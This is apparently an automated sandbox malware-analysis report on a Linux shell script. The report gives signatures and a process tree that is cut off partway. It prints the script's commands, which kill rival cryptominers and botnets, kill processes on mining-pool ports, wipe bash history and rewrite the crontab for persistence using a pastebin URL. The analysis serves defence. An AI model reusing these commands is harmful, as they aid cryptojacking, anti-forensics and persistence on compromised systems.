d30538787f9b9b9c2bdb9a438e49b39e655642bc1ce21dac8a7b58f71d0f3f45

Analysis

max time kernel
52s
max time network
45s
platform
debian-9_mips
resource
debian9-mipsbe-20231221-en
resource tags

arch:mipsimage:debian9-mipsbe-20231221-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
14/02/2024, 13:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

al.txt
Size

3KB
MD5

a84cc0a810b8772bfd33e660dd1f05da
SHA1

155b9c06a1e3896f6336ea7a250078a015d269e5
SHA256

d30538787f9b9b9c2bdb9a438e49b39e655642bc1ce21dac8a7b58f71d0f3f45
SHA512

ecf516c1147ea307c2254c4b622bfc24984f011be42fe1a4c3356ae2bde51192af13f77f7238a2ba93233f4516a34478a893fdc035f901426540ba00ecb21421

Score

6^/10

persistence

Malware Config

Signatures

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

persistence

Scheduled Task/Job

T1053

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.TZ2Iwu	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	pastebin.com
2	pastebin.com

Reads CPU attributes 1 TTPs 64 IoCs

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	top
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/18/status	pkill
File opened for reading	/proc/10/status	ps
File opened for reading	/proc/345/cmdline	ps
File opened for reading	/proc/23/stat	ps
File opened for reading	/proc/707/cmdline	pkill
File opened for reading	/proc/769/status	pkill
File opened for reading	/proc/5/cmdline	pkill
File opened for reading	/proc/727/status	pkill
File opened for reading	/proc/15/cmdline	pkill
File opened for reading	/proc/707/cmdline	pgrep
File opened for reading	/proc/338/status	pkill
File opened for reading	/proc/339/cmdline	pkill
File opened for reading	/proc/11/cmdline	pkill
File opened for reading	/proc/71/status	pkill
File opened for reading	/proc/126/cmdline	ps
File opened for reading	/proc/2/cmdline	pkill
File opened for reading	/proc/14/cmdline	pkill
File opened for reading	/proc/7/status	ps
File opened for reading	/proc/710/status	pkill
File opened for reading	/proc/159/cmdline	pkill
File opened for reading	/proc/37/status	pkill
File opened for reading	/proc/806/status	pkill
File opened for reading	/proc/24/cmdline	pkill
File opened for reading	/proc/386/cmdline	pkill
File opened for reading	/proc/675/status	pkill
File opened for reading	/proc/156/cmdline	ps
File opened for reading	/proc/710/stat	ps
File opened for reading	/proc/74/cmdline	ps
File opened for reading	/proc/81/cmdline	pkill
File opened for reading	/proc/669/cmdline	pkill
File opened for reading	/proc/5/cmdline	pkill
File opened for reading	/proc/22/cmdline	pkill
File opened for reading	/proc/345/status	pkill
File opened for reading	/proc/13/cmdline	pkill
File opened for reading	/proc/7/cmdline	ps
File opened for reading	/proc/339/cmdline	ps
File opened for reading	/proc/736/status	pkill
File opened for reading	/proc/711/status	pkill
File opened for reading	/proc/4/status	pkill
File opened for reading	/proc/711/cmdline	pkill
File opened for reading	/proc/174/cmdline	ps
File opened for reading	/proc/857/stat	ps
File opened for reading	/proc/21/cmdline	pkill
File opened for reading	/proc/437/status	pkill
File opened for reading	/proc/12/cmdline	pkill
File opened for reading	/proc/16/cmdline	pkill
File opened for reading	/proc/23/cmdline	pkill
File opened for reading	/proc/174/status	pkill
File opened for reading	/proc/10/status	pkill
File opened for reading	/proc/17/cmdline	pkill
File opened for reading	/proc/382/status	pkill
File opened for reading	/proc/72/status	pkill
File opened for reading	/proc/238/statm	top
File opened for reading	/proc/21/status	pkill
File opened for reading	/proc/705/status	pkill
File opened for reading	/proc/252/cmdline	pkill
File opened for reading	/proc/383/status	pkill
File opened for reading	/proc/252/status	pkill
File opened for reading	/proc/718/status	pkill
File opened for reading	/proc/437/cmdline	pgrep
File opened for reading	/proc/437/cmdline	pkill
File opened for reading	/proc/7	ls
File opened for reading	/proc/81/cmdline	pkill
File opened for reading	/proc/705/cmdline	pkill

Writes file to tmp directory 3 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/~/.bash_profile	al.txt
File opened for modification	/tmp/~/.bash_history	al.txt
File opened for modification	/tmp/~/.bashrc	al.txt

/tmp/al.txt
/tmp/al.txt
1⤵
- Writes file to tmp directory
PID:718
- /bin/rm
  rm -f "/dev/shm/*"
  2⤵
  PID:720
- /bin/rm
  rm -f /dev/shm/. /dev/shm/..
  2⤵
  PID:722
- /usr/bin/pkill
  pkill -f telnetd
  2⤵
  - Reads CPU attributes
  PID:724
- /usr/bin/pkill
  pkill -f network-managerr
  2⤵
  PID:731
- /usr/bin/pkill
  pkill -f ipv6_addrconfd
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:735
- /usr/bin/pkill
  pkill -f bdus-daemon
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:737
- /usr/bin/pkill
  pkill JavaUpdate
  2⤵
  - Reads CPU attributes
  PID:739
- /usr/bin/pkill
  pkill SSHD2
  2⤵
  - Reads CPU attributes
  PID:741
- /usr/bin/pkill
  pkill LSHT
  2⤵
  - Reads CPU attributes
  PID:743
- /usr/bin/xargs
  xargs kill -9
  2⤵
  PID:746
- - /usr/local/sbin/kill
    kill -9
    3⤵
    PID:748
- - /usr/local/bin/kill
    kill -9
    3⤵
    PID:748
- - /usr/sbin/kill
    kill -9
    3⤵
    PID:748
- - /usr/bin/kill
    kill -9
    3⤵
    PID:748
- - /sbin/kill
    kill -9
    3⤵
    PID:748
- - /bin/kill
    kill -9
    3⤵
    - Reads CPU attributes
    PID:748
- /usr/bin/pgrep
  pgrep LSHT
  2⤵
  - Reads CPU attributes
  PID:745
- /bin/chmod
  chmod +w /var/tmp/.bin
  2⤵
  PID:750
- /bin/rm
  rm -rf /var/tmp/.bin
  2⤵
  PID:752
- /bin/rm
  rm -rf "~/.bash_history"
  2⤵
  PID:753
- /usr/bin/touch
  touch /var/tmp/.bin
  2⤵
  PID:754
- /usr/bin/pkill
  pkill mysqlserver
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:755
- /usr/bin/pkill
  pkill gitlab-redis
  2⤵
  - Reads CPU attributes
  PID:756
- /bin/rm
  rm -rf /var/tmp/. /var/tmp/.. /var/tmp/.bin
  2⤵
  PID:757
- /usr/bin/pkill
  pkill -9 -f donate
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:758
- /usr/bin/pkill
  pkill -f /tmp/.solr
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:759
- /usr/bin/pkill
  pkill -9 -f crond64
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:760
- /usr/bin/pkill
  pkill -9 -f stratum
  2⤵
  - Reads runtime system information
  PID:761
- /usr/bin/pkill
  pkill -9 -f /tmp/java
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:762
- /usr/bin/pkill
  pkill -9 -f KIXER
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:763
- /usr/bin/pkill
  pkill -9 -f /tmp/system
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:764
- /usr/bin/pkill
  pkill -9 -f telnetd
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:765
- /usr/bin/pkill
  pkill -9 -f agettyd
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:766
- /usr/bin/pkill
  pkill -9 -f /var/tmp
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:767
- /usr/bin/pkill
  pkill -9 -f "\\./python"
  2⤵
  - Reads CPU attributes
  PID:768
- /usr/bin/pkill
  pkill -9 -f "\\./crun"
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:769
- /usr/bin/pkill
  pkill -9 -f "\\./\\."
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:770
- /usr/bin/pkill
  pkill -9 -f "118/cf\\.sh"
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:771
- /usr/bin/pkill
  pkill -9 "\\.6379"
  2⤵
  - Reads CPU attributes
  PID:772
- /usr/bin/pkill
  pkill -9 "load\\.sh"
  2⤵
  - Reads CPU attributes
  PID:773
- /usr/bin/pkill
  pkill -9 "init\\.sh"
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:774
- /usr/bin/pkill
  pkill -9 "solr\\.sh"
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:775
- /usr/bin/pkill
  pkill -9 "\\.rsyslogds"
  2⤵
  - Reads runtime system information
  PID:776
- /usr/bin/pkill
  pkill -9 pnscan
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:777
- /usr/bin/pkill
  pkill -9 masscan
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:778
- /usr/bin/pkill
  pkill -9 kthreaddi
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:779
- /usr/bin/pkill
  pkill -9 sysguard
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:780
- /usr/bin/pkill
  pkill -9 kthreaddk
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:781
- /usr/bin/pkill
  pkill -9 kdevtmpfsi
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:782
- /usr/bin/pkill
  pkill -9 networkservice
  2⤵
  - Reads CPU attributes
  PID:783
- /usr/bin/pkill
  pkill -9 sysupdate
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:784
- /bin/grep
  grep unifiw
  2⤵
  PID:787
- /bin/grep
  grep -v grep
  2⤵
  PID:786
- /usr/bin/top
  top -b -n 1
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:785
- /usr/bin/awk
  awk "{if(\$9<=50.0) print \$1}"
  2⤵
  PID:788
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:789
- /usr/bin/pkill
  pkill -9 phpguard
  2⤵
  - Reads CPU attributes
  PID:790
- /usr/bin/pkill
  pkill -9 phpupdate
  2⤵
  - Reads runtime system information
  PID:791
- /usr/bin/pkill
  pkill -9 networkmanager
  2⤵
  - Reads CPU attributes
  PID:792
- /usr/bin/pkill
  pkill -9 knthread
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:793
- /usr/bin/pkill
  pkill -9 mysqlserver
  2⤵
  - Reads CPU attributes
  PID:796
- /usr/bin/pkill
  pkill -9 watchbog
  2⤵
  - Reads CPU attributes
  PID:797
- /usr/bin/pkill
  pkill -9 xmrig
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:799
- /usr/bin/pkill
  pkill -f /tmp/.x111
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:801
- /usr/bin/killall
  killall "/tmp/.x111/*"
  2⤵
  PID:803
- /usr/bin/pkill
  pkill -9 -f /dev/shm
  2⤵
  - Reads CPU attributes
  PID:805
- /usr/bin/pkill
  pkill -9 bashirc
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:806
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:810
- /usr/bin/pgrep
  pgrep pbotbyjanhotzu
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:809
- /usr/bin/xargs
  xargs kill -9
  2⤵
  PID:815
- - /usr/local/sbin/kill
    kill -9
    3⤵
    PID:817
- - /usr/local/bin/kill
    kill -9
    3⤵
    PID:817
- - /usr/sbin/kill
    kill -9
    3⤵
    PID:817
- - /usr/bin/kill
    kill -9
    3⤵
    PID:817
- - /sbin/kill
    kill -9
    3⤵
    PID:817
- - /bin/kill
    kill -9
    3⤵
    - Reads CPU attributes
    PID:817
- /bin/sed
  sed -e "s/\\/.*//g"
  2⤵
  PID:814
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:813
- /bin/grep
  grep :13531
  2⤵
  PID:812
- /usr/bin/xargs
  xargs kill -9
  2⤵
  PID:827
- - /usr/local/sbin/kill
    kill -9
    3⤵
    PID:828
- - /usr/local/bin/kill
    kill -9
    3⤵
    PID:828
- - /usr/sbin/kill
    kill -9
    3⤵
    PID:828
- - /usr/bin/kill
    kill -9
    3⤵
    PID:828
- - /sbin/kill
    kill -9
    3⤵
    PID:828
- - /bin/kill
    kill -9
    3⤵
    - Reads CPU attributes
    PID:828
- /bin/sed
  sed -e "s/\\/.*//g"
  2⤵
  PID:826
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:825
- /bin/grep
  grep :5555
  2⤵
  PID:824
- /usr/bin/xargs
  xargs kill -9
  2⤵
  PID:837
- - /usr/local/sbin/kill
    kill -9
    3⤵
    PID:839
- - /usr/local/bin/kill
    kill -9
    3⤵
    PID:839
- - /usr/sbin/kill
    kill -9
    3⤵
    PID:839
- - /usr/bin/kill
    kill -9
    3⤵
    PID:839
- - /sbin/kill
    kill -9
    3⤵
    PID:839
- - /bin/kill
    kill -9
    3⤵
    - Reads CPU attributes
    PID:839
- /bin/sed
  sed -e "s/\\/.*//g"
  2⤵
  PID:836
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:835
- /bin/grep
  grep :33331
  2⤵
  PID:834
- /usr/bin/xargs
  xargs kill -9
  2⤵
  PID:849
- - /usr/local/sbin/kill
    kill -9
    3⤵
    PID:850
- - /usr/local/bin/kill
    kill -9
    3⤵
    PID:850
- - /usr/sbin/kill
    kill -9
    3⤵
    PID:850
- - /usr/bin/kill
    kill -9
    3⤵
    PID:850
- - /sbin/kill
    kill -9
    3⤵
    PID:850
- - /bin/kill
    kill -9
    3⤵
    - Reads CPU attributes
    PID:850
- /bin/sed
  sed -e "s/\\/.*//g"
  2⤵
  PID:848
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:847
- /bin/grep
  grep :33332
  2⤵
  PID:846
- /usr/bin/xargs
  xargs kill -9
  2⤵
  PID:863
- - /usr/local/sbin/kill
    kill -9
    3⤵
    PID:864
- - /usr/local/bin/kill
    kill -9
    3⤵
    PID:864
- - /usr/sbin/kill
    kill -9
    3⤵
    PID:864
- - /usr/bin/kill
    kill -9
    3⤵
    PID:864
- - /sbin/kill
    kill -9
    3⤵
    PID:864
- - /bin/kill
    kill -9
    3⤵
    - Reads CPU attributes
    PID:864
- /bin/sed
  sed -e "s/\\/.*//g"
  2⤵
  PID:862
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:861
- /bin/grep
  grep :17777
  2⤵
  PID:860
- /usr/bin/xargs
  xargs kill -9
  2⤵
  PID:878
- - /usr/local/sbin/kill
    kill -9
    3⤵
    PID:880
- - /usr/local/bin/kill
    kill -9
    3⤵
    PID:880
- - /usr/sbin/kill
    kill -9
    3⤵
    PID:880
- - /usr/bin/kill
    kill -9
    3⤵
    PID:880
- - /sbin/kill
    kill -9
    3⤵
    PID:880
- - /bin/kill
    kill -9
    3⤵
    - Reads CPU attributes
    PID:880
- /bin/sed
  sed -e "s/\\/.*//g"
  2⤵
  PID:877
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:876
- /bin/grep
  grep :3333
  2⤵
  PID:875
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:888
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:887
- /bin/grep
  grep /tmp/.x111
  2⤵
  PID:886
- /bin/grep
  grep -v grep
  2⤵
  PID:885
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:884
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:892
- /bin/grep
  grep kinsing
  2⤵
  PID:891
- /bin/grep
  grep -v grep
  2⤵
  PID:890
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:893
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:889
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:898
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:897
- /bin/grep
  grep kremasys
  2⤵
  PID:896
- /bin/grep
  grep -v grep
  2⤵
  PID:895
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:894
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:903
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:902
- /bin/grep
  grep "while read procid"
  2⤵
  PID:901
- /bin/grep
  grep -v grep
  2⤵
  PID:900
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:899
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:908
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:907
- /bin/grep
  grep kdevtmpfsi
  2⤵
  PID:906
- /bin/grep
  grep -v grep
  2⤵
  PID:905
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:904
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:913
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:912
- /bin/grep
  grep KGN1cmwg
  2⤵
  PID:911
- /bin/grep
  grep -v grep
  2⤵
  PID:910
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:909
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:918
- - /usr/local/sbin/kill
    kill -9 704
    3⤵
    PID:919
- - /usr/local/bin/kill
    kill -9 704
    3⤵
    PID:919
- - /usr/sbin/kill
    kill -9 704
    3⤵
    PID:919
- - /usr/bin/kill
    kill -9 704
    3⤵
    PID:919
- - /sbin/kill
    kill -9 704
    3⤵
    PID:919
- - /bin/kill
    kill -9 704
    3⤵
    - Reads CPU attributes
    PID:919
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:917
- /bin/grep
  grep .dat
  2⤵
  PID:916
- /bin/grep
  grep -v grep
  2⤵
  PID:915
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:914
- /bin/rm
  rm /tmp/.dat
  2⤵
  PID:923
- /usr/bin/pkill
  pkill kinsing
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:924
- /usr/bin/pkill
  pkill -9 zgrab
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:925
- /bin/grep
  grep -q https://pastebin.com/raw/rVXcPD8Z
  2⤵
  PID:927
- /usr/bin/crontab
  crontab -l
  2⤵
  PID:926
- /usr/bin/crontab
  crontab -r
  2⤵
  PID:928
- /usr/bin/crontab
  crontab -
  2⤵
  - Creates/modifies Cron job
  PID:930
- /bin/grep
  grep unifiw
  2⤵
  PID:940
- /bin/ls
  ls -al /proc/1
  2⤵
  PID:939
- /bin/grep
  grep -a donate-level /proc/1/exe
  2⤵
  PID:941
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:944
- /bin/grep
  grep exe
  2⤵
  PID:943
- /bin/ls
  ls -al /proc/1
  2⤵
  PID:942
- /bin/grep
  grep unifiw
  2⤵
  PID:946
- /bin/ls
  ls -al /proc/10
  2⤵
  PID:945
- /bin/grep
  grep -a donate-level /proc/10/exe
  2⤵
  PID:947
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:950
- /bin/grep
  grep exe
  2⤵
  PID:949
- /bin/ls
  ls -al /proc/10
  2⤵
  PID:948
- /bin/grep
  grep unifiw
  2⤵
  PID:952
- /bin/ls
  ls -al /proc/109
  2⤵
  PID:951
- /bin/grep
  grep -a donate-level /proc/109/exe
  2⤵
  PID:953
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:956
- /bin/grep
  grep exe
  2⤵
  PID:955
- /bin/ls
  ls -al /proc/109
  2⤵
  PID:954
- /bin/grep
  grep unifiw
  2⤵
  PID:958
- /bin/ls
  ls -al /proc/11
  2⤵
  PID:957
- /bin/grep
  grep -a donate-level /proc/11/exe
  2⤵
  PID:959
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:962
- /bin/grep
  grep exe
  2⤵
  PID:961
- /bin/ls
  ls -al /proc/11
  2⤵
  PID:960
- /bin/grep
  grep unifiw
  2⤵
  PID:964
- /bin/ls
  ls -al /proc/12
  2⤵
  PID:963
- /bin/grep
  grep -a donate-level /proc/12/exe
  2⤵
  PID:965
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:968
- /bin/grep
  grep exe
  2⤵
  PID:967
- /bin/ls
  ls -al /proc/12
  2⤵
  PID:966
- /bin/grep
  grep unifiw
  2⤵
  PID:970
- /bin/ls
  ls -al /proc/125
  2⤵
  PID:969
- /bin/grep
  grep -a donate-level /proc/125/exe
  2⤵
  PID:971
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:974
- /bin/grep
  grep exe
  2⤵
  PID:973
- /bin/ls
  ls -al /proc/125
  2⤵
  PID:972
- /bin/grep
  grep unifiw
  2⤵
  PID:976
- /bin/ls
  ls -al /proc/126
  2⤵
  PID:975
- /bin/grep
  grep -a donate-level /proc/126/exe
  2⤵
  PID:979
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:982
- /bin/grep
  grep exe
  2⤵
  PID:981
- /bin/ls
  ls -al /proc/126
  2⤵
  PID:980
- /bin/grep
  grep unifiw
  2⤵
  PID:986
- /bin/ls
  ls -al /proc/13
  2⤵
  PID:985
- /bin/grep
  grep -a donate-level /proc/13/exe
  2⤵
  PID:988
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:992
- /bin/grep
  grep exe
  2⤵
  PID:991
- /bin/ls
  ls -al /proc/13
  2⤵
  PID:990
- /bin/grep
  grep unifiw
  2⤵
  PID:994
- /bin/ls
  ls -al /proc/14
  2⤵
  PID:993
- /bin/grep
  grep -a donate-level /proc/14/exe
  2⤵
  PID:997
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1000
- /bin/grep
  grep exe
  2⤵
  PID:999
- /bin/ls
  ls -al /proc/14
  2⤵
  PID:998
- /bin/grep
  grep unifiw
  2⤵
  PID:1004
- /bin/ls
  ls -al /proc/15
  2⤵
  PID:1003
- /bin/grep
  grep -a donate-level /proc/15/exe
  2⤵
  PID:1006
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1009
- /bin/grep
  grep exe
  2⤵
  PID:1008
- /bin/ls
  ls -al /proc/15
  2⤵
  PID:1007
- /bin/grep
  grep unifiw
  2⤵
  PID:1012
- /bin/ls
  ls -al /proc/156
  2⤵
  PID:1011
- /bin/grep
  grep -a donate-level /proc/156/exe
  2⤵
  PID:1015
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1018
- /bin/grep
  grep exe
  2⤵
  PID:1017
- /bin/ls
  ls -al /proc/156
  2⤵
  PID:1016
- /bin/grep
  grep unifiw
  2⤵
  PID:1021
- /bin/ls
  ls -al /proc/159
  2⤵
  PID:1020
- /bin/grep
  grep -a donate-level /proc/159/exe
  2⤵
  PID:1023
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1026
- /bin/grep
  grep exe
  2⤵
  PID:1025
- /bin/ls
  ls -al /proc/159
  2⤵
  PID:1024
- /bin/grep
  grep unifiw
  2⤵
  PID:1030
- /bin/ls
  ls -al /proc/16
  2⤵
  PID:1029
- /bin/grep
  grep -a donate-level /proc/16/exe
  2⤵
  PID:1031
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1035
- /bin/grep
  grep exe
  2⤵
  PID:1034
- /bin/ls
  ls -al /proc/16
  2⤵
  PID:1033
- /bin/grep
  grep unifiw
  2⤵
  PID:1038
- /bin/ls
  ls -al /proc/17
  2⤵
  PID:1037
- /bin/grep
  grep -a donate-level /proc/17/exe
  2⤵
  PID:1041
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1044
- /bin/grep
  grep exe
  2⤵
  PID:1043
- /bin/ls
  ls -al /proc/17
  2⤵
  PID:1042
- /bin/grep
  grep unifiw
  2⤵
  PID:1048
- /bin/ls
  ls -al /proc/174
  2⤵
  PID:1047
- /bin/grep
  grep -a donate-level /proc/174/exe
  2⤵
  PID:1049
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1053
- /bin/grep
  grep exe
  2⤵
  PID:1052
- /bin/ls
  ls -al /proc/174
  2⤵
  PID:1051
- /bin/grep
  grep unifiw
  2⤵
  PID:1056
- /bin/ls
  ls -al /proc/18
  2⤵
  PID:1055
- /bin/grep
  grep -a donate-level /proc/18/exe
  2⤵
  PID:1058
- /bin/grep
  grep "/var/tmp\\|/tmp\\|/dev/shm\\|/var/log/gitlab/gitlab-rails\\|/opt/backup/git_lab_backup"
  2⤵
  PID:1062
- /bin/grep
  grep exe
  2⤵
  PID:1061
- /bin/ls
  ls -al /proc/18
  2⤵
  PID:1060
- /bin/grep
  grep unifiw
  2⤵
  PID:1064
- /bin/ls
